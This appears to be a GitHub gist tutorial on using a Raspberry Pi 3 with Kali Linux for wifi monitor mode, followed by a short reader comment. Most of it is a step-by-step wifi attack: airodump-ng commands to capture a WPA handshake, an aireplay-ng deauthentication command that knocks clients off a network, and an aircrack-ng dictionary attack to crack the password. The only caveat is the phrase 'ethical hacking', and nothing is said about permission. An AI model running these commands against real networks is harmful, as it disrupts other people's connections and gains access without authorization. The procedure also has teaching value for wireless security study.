Skip to content

Instantly share code, notes, and snippets.

@McCannDahl
Last active November 6, 2023 22:14
Show Gist options
  • Save McCannDahl/a3cdde895ab1a758bffe8b5780c26ae5 to your computer and use it in GitHub Desktop.
Save McCannDahl/a3cdde895ab1a758bffe8b5780c26ae5 to your computer and use it in GitHub Desktop.
Raspberry Pi 3 in Monitoring Mode

Want to do some ethical hacking with only a Raspberry Pi 3?

No extra hardware required! Follow these steps:

  1. Download kali for raspberry pi & flash the OS onto the SD card
  2. iw phy phy0 interface add mon0 type monitor
  3. ifconfig mon0 up
    *alternatively try: airmon-ng start wlan0

To hack wifi

You may or may not have to do this

  1. airmon-ng check kill
    This will show your wireless cards such as mon0
  2. airmon-ng
    This will scan for wireless networks in the area
  3. airodump-ng mon0
    This will attept to get a handshake from a selected wifi network
  4. airodump-ng -c [channel] --bssid [bssid of wifi] -w temp/someOutputFile mon0
    In a separate terminal, do this at the same time. Do this until you get a handshake
  5. aireplay-ng –0 10 -a [bssid of wifi] mon0
    In another separate terminal, this will disconnect clients from that wifi. This will take a while
  6. aircrack-ng -b [bssid of wifi] -w [path to word dictionary] [path to capture packets .cap file]
    In another terminal this will go through a lot of passwords and crack the captured handshake

See https://www.novaspirit.com/2018/04/24/kali-linux-raspberry-pi-3b-monitor-mode/

@ericdallo
Copy link

Nice tutorial ;)
Use to learn this using backtracking/Kali Linux, [this is a nice script] that have some useful tricks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment